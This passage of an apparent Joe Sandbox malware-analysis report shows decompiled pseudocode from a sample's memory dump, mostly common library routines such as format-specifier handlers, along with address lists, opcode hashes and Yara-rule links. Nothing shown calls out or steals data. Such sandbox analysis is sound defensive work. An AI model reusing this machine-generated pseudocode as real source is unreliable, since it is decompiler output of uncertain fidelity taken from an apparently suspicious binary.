								_t160 = ( *(_t169 + _t114 + 0x88) & 0x000000ff) +  *(_t175 + 4);
								 *_t175 =  *_t175 + (_t160 >> 3);
								 *(_t175 + 4) = _t160 & 0x00000007;
								_t77 =  *(_t114 + 0x488 + _t169 * 2) & 0x0000ffff;
								goto L28;
							}
							__eflags =  *_t175 -  *((intOrPtr*)(_t177 + 0x84)) - 5;
							if( *_t175 <=  *((intOrPtr*)(_t177 + 0x84)) - 5) {
								goto L19;
							}
							_t94 = E00CD4E52(_t177);
							__eflags = _t94;
							if(_t94 == 0) {
								goto L48;
							}
							goto L19;
							L45:
							__eflags = _t172 - 0x1ae;
						} while (_t172 < 0x1ae);
						L46:
						 *((char*)(_t177 + 0xe662)) = 1;
						__eflags =  *((char*)(_t175 + 8));
						if( *((char*)(_t175 + 8)) != 0) {
							L49:
							_t118 =  *((intOrPtr*)(_t178 + 0x1e8));
							_push(0x132);
							_push(_t118);
							_push(_t178 + 0x2c);
							E00CD3797();
							_push(0x40);
							_push(_t118 + 0xeec);
							_push(_t178 + 0x166);
							E00CD3797();
							_t147 = 0x10;
							_push(_t147);
							_push(_t118 + 0x1dd8);
							_push(_t178 + 0x1a6);
							E00CD3797();
							_push(0x2c);
							_push(_t118 + 0x2cc4);
							_push(_t178 + 0x1b6);
							E00CD3797();
							_t90 = 1;
							goto L50;
						}
						__eflags =  *_t175 -  *((intOrPtr*)(_t177 + 0x84));
						if( *_t175 <=  *((intOrPtr*)(_t177 + 0x84))) {
							goto L49;
						}
						goto L48;
					}
					__eflags =  *_t175 -  *((intOrPtr*)(__ecx + 0x84)) - 0x19;
					if( *_t175 <=  *((intOrPtr*)(__ecx + 0x84)) - 0x19) {
						goto L5;
					}
					_t108 = E00CD4E52(__ecx);
					__eflags = _t108;
					if(_t108 == 0) {
						goto L48;
					}
					goto L5;
				}
				return 1;
			}








































                                                    0x00cd43ce
                                                    0x00cd43d0
                                                    0x00cd43db
                                                    0x00cd43e3
                                                    0x00cd43e7
                                                    0x00cd4403
                                                    0x00cd4403
                                                    0x00cd4403
                                                    0x00cd4405
                                                    0x00cd4412
                                                    0x00cd4415
                                                    0x00cd441a
                                                    0x00cd441d
                                                    0x00cd4456
                                                    0x00000000
                                                    0x00cd4456
                                                    0x00cd442d
                                                    0x00cd4430
                                                    0x00cd4435
                                                    0x00cd4437
                                                    0x00cd4440
                                                    0x00cd4440
                                                    0x00cd4443
                                                    0x00cd4443
                                                    0x00cd4444
                                                    0x00cd4447
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd4449
                                                    0x00cd444e
                                                    0x00cd444f
                                                    0x00cd4451
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd4451
                                                    0x00cd4453
                                                    0x00000000
                                                    0x00cd4453
                                                    0x00cd4439
                                                    0x00cd445a
                                                    0x00cd445a
                                                    0x00cd445b
                                                    0x00cd445b
                                                    0x00cd446b
                                                    0x00cd446d
                                                    0x00cd4475
                                                    0x00cd4476
                                                    0x00cd4477
                                                    0x00cd447b
                                                    0x00cd4480
                                                    0x00cd4480
                                                    0x00cd4482
                                                    0x00cd4482
                                                    0x00cd4486
                                                    0x00cd44a4
                                                    0x00cd44a6
                                                    0x00cd44ad
                                                    0x00cd44b3
                                                    0x00cd44b9
                                                    0x00cd44bd
                                                    0x00cd44ea
                                                    0x00cd44eb
                                                    0x00cd44ec
                                                    0x00cd44f0
                                                    0x00cd44f2
                                                    0x00cd450d
                                                    0x00cd4510
                                                    0x00cd451c
                                                    0x00cd451e
                                                    0x00cd4522
                                                    0x00cd4527
                                                    0x00cd4533
                                                    0x00cd4535
                                                    0x00cd4537
                                                    0x00cd4539
                                                    0x00cd4539
                                                    0x00cd453b
                                                    0x00cd4543
                                                    0x00cd4545
                                                    0x00cd4546
                                                    0x00cd4549
                                                    0x00cd4557
                                                    0x00cd4558
                                                    0x00cd455b
                                                    0x00cd45a9
                                                    0x00cd45ab
                                                    0x00cd45c8
                                                    0x00cd45c8
                                                    0x00cd45cb
                                                    0x00cd45ad
                                                    0x00cd45b7
                                                    0x00cd45ba
                                                    0x00cd45ba
                                                    0x00cd45cd
                                                    0x00cd45d1
                                                    0x00cd45d6
                                                    0x00cd45d6
                                                    0x00cd45d7
                                                    0x00cd45dd
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd45df
                                                    0x00cd45e4
                                                    0x00cd45e5
                                                    0x00cd45e7
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd45e9
                                                    0x00cd45e9
                                                    0x00000000
                                                    0x00cd45e9
                                                    0x00000000
                                                    0x00cd45d6
                                                    0x00cd455d
                                                    0x00cd4560
                                                    0x00cd4562
                                                    0x00cd457f
                                                    0x00cd457f
                                                    0x00cd4582
                                                    0x00cd4564
                                                    0x00cd456e
                                                    0x00cd4571
                                                    0x00cd4571
                                                    0x00cd4584
                                                    0x00cd4588
                                                    0x00cd458d
                                                    0x00cd458f
                                                    0x00cd4610
                                                    0x00cd4610
                                                    0x00cd4679
                                                    0x00000000
                                                    0x00cd4591
                                                    0x00cd4591
                                                    0x00cd4591
                                                    0x00cd4592
                                                    0x00cd4598
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd459e
                                                    0x00cd45a2
                                                    0x00cd45a3
                                                    0x00cd45a5
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd45a7
                                                    0x00000000
                                                    0x00cd4591
                                                    0x00cd458f
                                                    0x00cd454b
                                                    0x00cd454f
                                                    0x00000000
                                                    0x00cd454f
                                                    0x00cd44f7
                                                    0x00cd44fa
                                                    0x00cd44fa
                                                    0x00cd44fc
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd44fe
                                                    0x00cd44ff
                                                    0x00cd4502
                                                    0x00cd4505
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd4507
                                                    0x00cd4509
                                                    0x00000000
                                                    0x00cd4509
                                                    0x00cd44c1
                                                    0x00cd44c4
                                                    0x00cd44ce
                                                    0x00cd44d6
                                                    0x00cd44db
                                                    0x00cd44de
                                                    0x00000000
                                                    0x00cd44de
                                                    0x00cd4491
                                                    0x00cd4493
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd4497
                                                    0x00cd449c
                                                    0x00cd449e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd45ed
                                                    0x00cd45ed
                                                    0x00cd45ed
                                                    0x00cd45f9
                                                    0x00cd45f9
                                                    0x00cd4600
                                                    0x00cd4604
                                                    0x00cd4614
                                                    0x00cd4614
                                                    0x00cd461f
                                                    0x00cd4624
                                                    0x00cd4625
                                                    0x00cd4628
                                                    0x00cd462d
                                                    0x00cd4637
                                                    0x00cd463f
                                                    0x00cd4640
                                                    0x00cd4647
                                                    0x00cd4648
                                                    0x00cd4651
                                                    0x00cd4659
                                                    0x00cd465a
                                                    0x00cd465f
                                                    0x00cd4667
                                                    0x00cd466f
                                                    0x00cd4672
                                                    0x00cd4677
                                                    0x00000000
                                                    0x00cd4677
                                                    0x00cd4608
                                                    0x00cd460e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd460e
                                                    0x00cd43f2
                                                    0x00cd43f4
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd43f6
                                                    0x00cd43fb
                                                    0x00cd43fd
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd43fd
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                    • Instruction ID: 59add1a23be4f4217d4a2af988b56b097ea5d4b4075c0942baf6a74c3e6c820a
                                                    • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                    • Instruction Fuzzy Hash: 49813B713043469BDB2CDE68D8D5BBD77D4AB91308F00092FFB968B382DA70C9869756
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CE51C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODECrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 84%
                                                    			E00CE51C9(void* __ecx, void* __edi) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __esi;
				signed int _t52;
				signed int _t54;
				signed int _t55;
				void* _t56;
				signed int _t57;
				signed char _t60;
				signed char _t62;
				signed int _t64;
				void* _t65;
				signed int _t66;
				signed char _t75;
				signed char _t78;
				void* _t86;
				void* _t88;
				signed char _t90;
				signed char _t92;
				signed int _t93;
				signed int _t95;
				signed int _t97;
				signed int _t98;
				signed int _t101;
				void* _t103;
				signed int _t109;
				unsigned int _t111;
				signed char _t113;
				unsigned int _t121;
				void* _t122;
				signed int _t123;
				short _t124;
				void* _t127;
				void* _t128;
				void* _t129;
				signed int _t130;
				void* _t131;
				void* _t133;
				void* _t134;

				_t122 = __edi;
				_t52 =  *0xcfe7ac; // 0x349e4b74
				_v8 = _t52 ^ _t130;
				_t129 = __ecx;
				_t101 = 0;
				_t121 = 0x41;
				_t54 =  *(__ecx + 0x32) & 0x0000ffff;
				_t103 = 0x58;
				_t133 = _t54 - 0x64;
				if(_t133 > 0) {
					__eflags = _t54 - 0x70;
					if(__eflags > 0) {
						_t55 = _t54 - 0x73;
						__eflags = _t55;
						if(_t55 == 0) {
							L9:
							_t56 = E00CE5BFB(_t129);
							L10:
							if(_t56 != 0) {
								__eflags =  *((intOrPtr*)(_t129 + 0x30)) - _t101;
								if( *((intOrPtr*)(_t129 + 0x30)) != _t101) {
									L71:
									_t57 = 1;
									L72:
									return E00CDFBBC(_t57, _t101, _v8 ^ _t130, _t121, _t122, _t129);
								}
								_t121 =  *(_t129 + 0x20);
								_push(_t122);
								_v16 = _t101;
								_t60 = _t121 >> 4;
								_v12 = _t101;
								_t123 = 0x20;
								__eflags = 1 & _t60;
								if((1 & _t60) == 0) {
									L46:
									_t109 =  *(_t129 + 0x32) & 0x0000ffff;
									__eflags = _t109 - 0x78;
									if(_t109 == 0x78) {
										L48:
										_t62 = _t121 >> 5;
										__eflags = _t62 & 0x00000001;
										if((_t62 & 0x00000001) == 0) {
											L50:
											__eflags = 0;
											L51:
											__eflags = _t109 - 0x61;
											if(_t109 == 0x61) {
												L54:
												_t64 = 1;
												L55:
												_t124 = 0x30;
												__eflags = _t64;
												if(_t64 != 0) {
													L57:
													_t65 = 0x58;
													 *((short*)(_t130 + _t101 * 2 - 0xc)) = _t124;
													__eflags = _t109 - _t65;
													if(_t109 == _t65) {
														L60:
														_t66 = 1;
														L61:
														__eflags = _t66;
														asm("cbw");
														 *((short*)(_t130 + _t101 * 2 - 0xa)) = ((_t66 & 0xffffff00 | _t66 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
														_t101 = _t101 + 2;
														__eflags = _t101;
														L62:
														_t127 =  *((intOrPtr*)(_t129 + 0x24)) -  *((intOrPtr*)(_t129 + 0x38)) - _t101;
														__eflags = _t121 & 0x0000000c;
														if((_t121 & 0x0000000c) == 0) {
															E00CE4490(_t129 + 0x448, 0x20, _t127, _t129 + 0x18);
															_t131 = _t131 + 0x10;
														}
														E00CE5F16(_t129 + 0x448,  &_v16, _t101, _t129 + 0x18,  *((intOrPtr*)(_t129 + 0xc)));
														_t111 =  *(_t129 + 0x20);
														_t101 = _t129 + 0x18;
														_t75 = _t111 >> 3;
														__eflags = _t75 & 0x00000001;
														if((_t75 & 0x00000001) != 0) {
															_t113 = _t111 >> 2;
															__eflags = _t113 & 0x00000001;
															if((_t113 & 0x00000001) == 0) {
																E00CE4490(_t129 + 0x448, 0x30, _t127, _t101);
																_t131 = _t131 + 0x10;
															}
														}
														E00CE5DF8(_t129, 0);
														__eflags =  *_t101;
														if( *_t101 >= 0) {
															_t78 =  *(_t129 + 0x20) >> 2;
															__eflags = _t78 & 0x00000001;
															if((_t78 & 0x00000001) != 0) {
																E00CE4490(_t129 + 0x448, 0x20, _t127, _t101);
															}
														}
														_pop(_t122);
														goto L71;
													}
													_t86 = 0x41;
													__eflags = _t109 - _t86;
													if(_t109 == _t86) {
														goto L60;
													}
													_t66 = 0;
													goto L61;
												}
												__eflags = _t64;
												if(_t64 == 0) {
													goto L62;
												}
												goto L57;
											}
											_t128 = 0x41;
											__eflags = _t109 - _t128;
											if(_t109 == _t128) {
												goto L54;
											}
											_t64 = 0;
											goto L55;
										}
										goto L51;
									}
									_t88 = 0x58;
									__eflags = _t109 - _t88;
									if(_t109 != _t88) {
										goto L50;
									}
									goto L48;
								}
								_t90 = _t121 >> 6;
								__eflags = 1 & _t90;
								if((1 & _t90) == 0) {
									__eflags = 1 & _t121;
									if((1 & _t121) == 0) {
										_t92 = _t121 >> 1;
										__eflags = 1 & _t92;
										if((1 & _t92) == 0) {
											goto L46;
										}
										_v16 = _t123;
										L45:
										_t101 = 1;
										goto L46;
									}
									_push(0x2b);
									L40:
									_pop(_t93);
									_v16 = _t93;
									goto L45;
								}
								_push(0x2d);
								goto L40;
							}
							L11:
							_t57 = 0;
							goto L72;
						}
						_t95 = _t55;
						__eflags = _t95;
						if(__eflags == 0) {
							L28:
							_push(_t101);
							_push(0xa);
							L29:
							_t56 = E00CE5993(_t129, _t122, __eflags);
							goto L10;
						}
						__eflags = _t95 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t56 = E00CE5B70(__ecx);
						goto L10;
					}
					__eflags = _t54 - 0x67;
					if(_t54 <= 0x67) {
						L30:
						_t56 = E00CE56F9(_t101, _t129);
						goto L10;
					}
					__eflags = _t54 - 0x69;
					if(_t54 == 0x69) {
						L27:
						_t3 = _t129 + 0x20;
						 *_t3 =  *(_t129 + 0x20) | 0x00000010;
						__eflags =  *_t3;
						goto L28;
					}
					__eflags = _t54 - 0x6e;
					if(_t54 == 0x6e) {
						_t56 = E00CE5ADD(__ecx, _t121);
						goto L10;
					}
					__eflags = _t54 - 0x6f;
					if(_t54 != 0x6f) {
						goto L11;
					}
					_t56 = E00CE5B51(__ecx);
					goto L10;
				}
				if(_t133 == 0) {
					goto L27;
				}
				_t134 = _t54 - _t103;
				if(_t134 > 0) {
					_t97 = _t54 - 0x5a;
					__eflags = _t97;
					if(_t97 == 0) {
						_t56 = E00CE553C(__ecx);
						goto L10;
					}
					_t98 = _t97 - 7;
					__eflags = _t98;
					if(_t98 == 0) {
						goto L30;
					}
					__eflags = _t98;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t56 = E00CE58FB(_t129, __eflags, _t101);
					goto L10;
				}
				if(_t134 == 0) {
					_push(1);
					goto L13;
				}
				if(_t54 == _t121) {
					goto L30;
				}
				if(_t54 == 0x43) {
					goto L17;
				}
				if(_t54 <= 0x44) {
					goto L11;
				}
				if(_t54 <= 0x47) {
					goto L30;
				}
				if(_t54 != 0x53) {
					goto L11;
				}
				goto L9;
			}












































                                                    0x00ce51c9
                                                    0x00ce51d1
                                                    0x00ce51d8
                                                    0x00ce51dd
                                                    0x00ce51df
                                                    0x00ce51e3
                                                    0x00ce51e6
                                                    0x00ce51ea
                                                    0x00ce51eb
                                                    0x00ce51ee
                                                    0x00ce525b
                                                    0x00ce525e
                                                    0x00ce52ad
                                                    0x00ce52ad
                                                    0x00ce52b0
                                                    0x00ce521c
                                                    0x00ce521e
                                                    0x00ce5223
                                                    0x00ce5225
                                                    0x00ce52cb
                                                    0x00ce52ce
                                                    0x00ce5414
                                                    0x00ce5414
                                                    0x00ce5416
                                                    0x00ce5425
                                                    0x00ce5425
                                                    0x00ce52d4
                                                    0x00ce52d9
                                                    0x00ce52dc
                                                    0x00ce52df
                                                    0x00ce52e3
                                                    0x00ce52e9
                                                    0x00ce52ea
                                                    0x00ce52ec
                                                    0x00ce5316
                                                    0x00ce5316
                                                    0x00ce531a
                                                    0x00ce531d
                                                    0x00ce5327
                                                    0x00ce5329
                                                    0x00ce532c
                                                    0x00ce532e
                                                    0x00ce5334
                                                    0x00ce5334
                                                    0x00ce5336
                                                    0x00ce5336
                                                    0x00ce5339
                                                    0x00ce5347
                                                    0x00ce5347
                                                    0x00ce5349
                                                    0x00ce534b
                                                    0x00ce534c
                                                    0x00ce534e
                                                    0x00ce5354
                                                    0x00ce5356
                                                    0x00ce5357
                                                    0x00ce535c
                                                    0x00ce535f
                                                    0x00ce536d
                                                    0x00ce536d
                                                    0x00ce536f
                                                    0x00ce536f
                                                    0x00ce537a
                                                    0x00ce537c
                                                    0x00ce5381
                                                    0x00ce5381
                                                    0x00ce5384
                                                    0x00ce538a
                                                    0x00ce538c
                                                    0x00ce538f
                                                    0x00ce539f
                                                    0x00ce53a4
                                                    0x00ce53a4
                                                    0x00ce53b9
                                                    0x00ce53be
                                                    0x00ce53c1
                                                    0x00ce53c6
                                                    0x00ce53c9
                                                    0x00ce53cb
                                                    0x00ce53cd
                                                    0x00ce53d0
                                                    0x00ce53d3
                                                    0x00ce53e0
                                                    0x00ce53e5
                                                    0x00ce53e5
                                                    0x00ce53d3
                                                    0x00ce53ec
                                                    0x00ce53f1
                                                    0x00ce53f4
                                                    0x00ce53f9
                                                    0x00ce53fc
                                                    0x00ce53fe
                                                    0x00ce540b
                                                    0x00ce5410
                                                    0x00ce53fe
                                                    0x00ce5413
                                                    0x00000000
                                                    0x00ce5413
                                                    0x00ce5363
                                                    0x00ce5364
                                                    0x00ce5367
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce5369
                                                    0x00000000
                                                    0x00ce5369
                                                    0x00ce5350
                                                    0x00ce5352
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce5352
                                                    0x00ce533d
                                                    0x00ce533e
                                                    0x00ce5341
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce5343
                                                    0x00000000
                                                    0x00ce5343
                                                    0x00000000
                                                    0x00ce5330
                                                    0x00ce5321
                                                    0x00ce5322
                                                    0x00ce5325
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce5325
                                                    0x00ce52f0
                                                    0x00ce52f3
                                                    0x00ce52f5
                                                    0x00ce5300
                                                    0x00ce5302
                                                    0x00ce530a
                                                    0x00ce530c
                                                    0x00ce530e
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce5310
                                                    0x00ce5314
                                                    0x00ce5314
                                                    0x00000000
                                                    0x00ce5314
                                                    0x00ce5304
                                                    0x00ce52f9
                                                    0x00ce52f9
                                                    0x00ce52fa
                                                    0x00000000
                                                    0x00ce52fa
                                                    0x00ce52f7
                                                    0x00000000
                                                    0x00ce52f7
                                                    0x00ce522b
                                                    0x00ce522b
                                                    0x00000000
                                                    0x00ce522b
                                                    0x00ce52b7
                                                    0x00ce52b7
                                                    0x00ce52ba
                                                    0x00ce528c
                                                    0x00ce528c
                                                    0x00ce528d
                                                    0x00ce528f
                                                    0x00ce5291
                                                    0x00000000
                                                    0x00ce5291
                                                    0x00ce52bc
                                                    0x00ce52bf
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce52c5
                                                    0x00ce5234
                                                    0x00ce5234
                                                    0x00000000
                                                    0x00ce5234
                                                    0x00ce5260
                                                    0x00ce52a3
                                                    0x00000000
                                                    0x00ce52a3
                                                    0x00ce5262
                                                    0x00ce5265
                                                    0x00ce5298
                                                    0x00ce529a
                                                    0x00000000
                                                    0x00ce529a
                                                    0x00ce5267
                                                    0x00ce526a
                                                    0x00ce5288
                                                    0x00ce5288
                                                    0x00ce5288
                                                    0x00ce5288
                                                    0x00000000
                                                    0x00ce5288
                                                    0x00ce526c
                                                    0x00ce526f
                                                    0x00ce5281
                                                    0x00000000
                                                    0x00ce5281
                                                    0x00ce5271
                                                    0x00ce5274
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce5278
                                                    0x00000000
                                                    0x00ce5278
                                                    0x00ce51f0
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce51f6
                                                    0x00ce51f8
                                                    0x00ce5238
                                                    0x00ce5238
                                                    0x00ce523b
                                                    0x00ce5254
                                                    0x00000000
                                                    0x00ce5254
                                                    0x00ce523d
                                                    0x00ce523d
                                                    0x00ce5240
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce5243
                                                    0x00ce5246
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce5248
                                                    0x00ce524b
                                                    0x00000000
                                                    0x00ce524b
                                                    0x00ce51fa
                                                    0x00ce5232
                                                    0x00000000
                                                    0x00ce5232
                                                    0x00ce51fe
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce5207
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce520c
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce5211
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce521a
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3a5e4164f116e6737245f2266134a339b4e36fc40a2ce9609730d42c2718a487
                                                    • Instruction ID: 5165a2e02f586c00ce4fff492c5b405c532668a075dd162694359eaf3e13a50b
                                                    • Opcode Fuzzy Hash: 3a5e4164f116e6737245f2266134a339b4e36fc40a2ce9609730d42c2718a487
                                                    • Instruction Fuzzy Hash: 4561CE75A00FC957CE389A6B58927BE2394EF0134CF14051AE763DF2D2D691DF429315
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CE4F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODECrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 88%
                                                    			E00CE4F9A(void* __ecx) {
				char _v6;
				char _v8;
				void* __ebx;
				void* __edi;
				char _t49;
				signed int _t50;
				void* _t51;
				signed char _t54;
				signed char _t56;
				signed int _t57;
				signed int _t58;
				signed char _t67;
				signed char _t69;
				signed char _t71;
				signed char _t80;
				signed char _t82;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed char _t92;
				void* _t95;
				intOrPtr _t100;
				unsigned int _t102;
				signed char _t104;
				void* _t112;
				unsigned int _t113;
				void* _t114;
				signed int _t115;
				signed int* _t116;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t124;
				void* _t125;

				_push(__ecx);
				_t119 = __ecx;
				_t92 = 1;
				_t49 =  *((char*)(__ecx + 0x31));
				_t124 = _t49 - 0x64;
				if(_t124 > 0) {
					__eflags = _t49 - 0x70;
					if(__eflags > 0) {
						_t50 = _t49 - 0x73;
						__eflags = _t50;
						if(_t50 == 0) {
							L9:
							_t51 = E00CE5B88(_t119);
							L10:
							if(_t51 != 0) {
								__eflags =  *((char*)(_t119 + 0x30));
								if( *((char*)(_t119 + 0x30)) == 0) {
									_t113 =  *(_t119 + 0x20);
									_push(_t114);
									_v8 = 0;
									_t115 = 0;
									_v6 = 0;
									_t54 = _t113 >> 4;
									__eflags = _t92 & _t54;
									if((_t92 & _t54) == 0) {
										L46:
										_t100 =  *((intOrPtr*)(_t119 + 0x31));
										__eflags = _t100 - 0x78;
										if(_t100 == 0x78) {
											L48:
											_t56 = _t113 >> 5;
											__eflags = _t92 & _t56;
											if((_t92 & _t56) != 0) {
												L50:
												__eflags = _t100 - 0x61;
												if(_t100 == 0x61) {
													L53:
													_t57 = 1;
													L54:
													__eflags = _t92;
													if(_t92 != 0) {
														L56:
														 *((char*)(_t121 + _t115 - 4)) = 0x30;
														__eflags = _t100 - 0x58;
														if(_t100 == 0x58) {
															L59:
															_t58 = 1;
															L60:
															__eflags = _t58;
															 *((char*)(_t121 + _t115 - 3)) = ((_t58 & 0xffffff00 | _t58 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
															_t115 = _t115 + 2;
															__eflags = _t115;
															L61:
															_t95 =  *((intOrPtr*)(_t119 + 0x24)) -  *((intOrPtr*)(_t119 + 0x38)) - _t115;
															__eflags = _t113 & 0x0000000c;
															if((_t113 & 0x0000000c) == 0) {
																E00CE4464(_t119 + 0x448, 0x20, _t95, _t119 + 0x18);
																_t122 = _t122 + 0x10;
															}
															E00CE5E83(_t119 + 0x448,  &_v8, _t115, _t119 + 0x18,  *((intOrPtr*)(_t119 + 0xc)));
															_t102 =  *(_t119 + 0x20);
															_t116 = _t119 + 0x18;
															_t67 = _t102 >> 3;
															__eflags = _t67 & 0x00000001;
															if((_t67 & 0x00000001) != 0) {
																_t104 = _t102 >> 2;
																__eflags = _t104 & 0x00000001;
																if((_t104 & 0x00000001) == 0) {
																	E00CE4464(_t119 + 0x448, 0x30, _t95, _t116);
																	_t122 = _t122 + 0x10;
																}
															}
															E00CE5D51(_t119, _t113, 0);
															__eflags =  *_t116;
															if( *_t116 >= 0) {
																_t71 =  *(_t119 + 0x20) >> 2;
																__eflags = _t71 & 0x00000001;
																if((_t71 & 0x00000001) != 0) {
																	E00CE4464(_t119 + 0x448, 0x20, _t95, _t116);
																}
															}
															_t69 = 1;
															L70:
															return _t69;
														}
														__eflags = _t100 - 0x41;
														if(_t100 == 0x41) {
															goto L59;
														}
														_t58 = 0;
														goto L60;
													}
													__eflags = _t57;
													if(_t57 == 0) {
														goto L61;
													}
													goto L56;
												}
												__eflags = _t100 - 0x41;
												if(_t100 == 0x41) {
													goto L53;
												}
												_t57 = 0;
												goto L54;
											}
											L49:
											_t92 = 0;
											__eflags = 0;
											goto L50;
										}
										__eflags = _t100 - 0x58;
										if(_t100 != 0x58) {
											goto L49;
										}
										goto L48;
									}
									_t80 = _t113 >> 6;
									__eflags = _t92 & _t80;
									if((_t92 & _t80) == 0) {
										__eflags = _t92 & _t113;
										if((_t92 & _t113) == 0) {
											_t82 = _t113 >> 1;
											__eflags = _t92 & _t82;
											if((_t92 & _t82) == 0) {
												goto L46;
											}
											_v8 = 0x20;
											L45:
											_t115 = _t92;
											goto L46;
										}
										_v8 = 0x2b;
										goto L45;
									}
									_v8 = 0x2d;
									goto L45;
								}
								_t69 = _t92;
								goto L70;
							}
							L11:
							_t69 = 0;
							goto L70;
						}
						_t84 = _t50;
						__eflags = _t84;
						if(__eflags == 0) {
							L28:
							_push(0);
							_push(0xa);
							L29:
							_t51 = E00CE5993(_t119, _t114, __eflags);
							goto L10;
						}
						__eflags = _t84 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t51 = E00CE5B70(__ecx);
						goto L10;
					}
					__eflags = _t49 - 0x67;
					if(_t49 <= 0x67) {
						L30:
						_t51 = E00CE559F(_t92, _t119, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x69;
					if(_t49 == 0x69) {
						L27:
						_t2 = _t119 + 0x20;
						 *_t2 =  *(_t119 + 0x20) | 0x00000010;
						__eflags =  *_t2;
						goto L28;
					}
					__eflags = _t49 - 0x6e;
					if(_t49 == 0x6e) {
						_t51 = E00CE5ADD(__ecx, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x6f;
					if(_t49 != 0x6f) {
						goto L11;
					}
					_t51 = E00CE5B51(__ecx);
					goto L10;
				}
				if(_t124 == 0) {
					goto L27;
				}
				_t125 = _t49 - 0x58;
				if(_t125 > 0) {
					_t86 = _t49 - 0x5a;
					__eflags = _t86;
					if(_t86 == 0) {
						_t51 = E00CE54D9(__ecx);
						goto L10;
					}
					_t87 = _t86 - 7;
					__eflags = _t87;
					if(_t87 == 0) {
						goto L30;
					}
					__eflags = _t87;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t51 = E00CE586B(_t92, _t119, __eflags, 0);
					goto L10;
				}
				if(_t125 == 0) {
					_push(1);
					goto L13;
				}
				if(_t49 == 0x41) {
					goto L30;
				}
				if(_t49 == 0x43) {
					goto L17;
				}
				if(_t49 <= 0x44) {
					goto L11;
				}
				if(_t49 <= 0x47) {
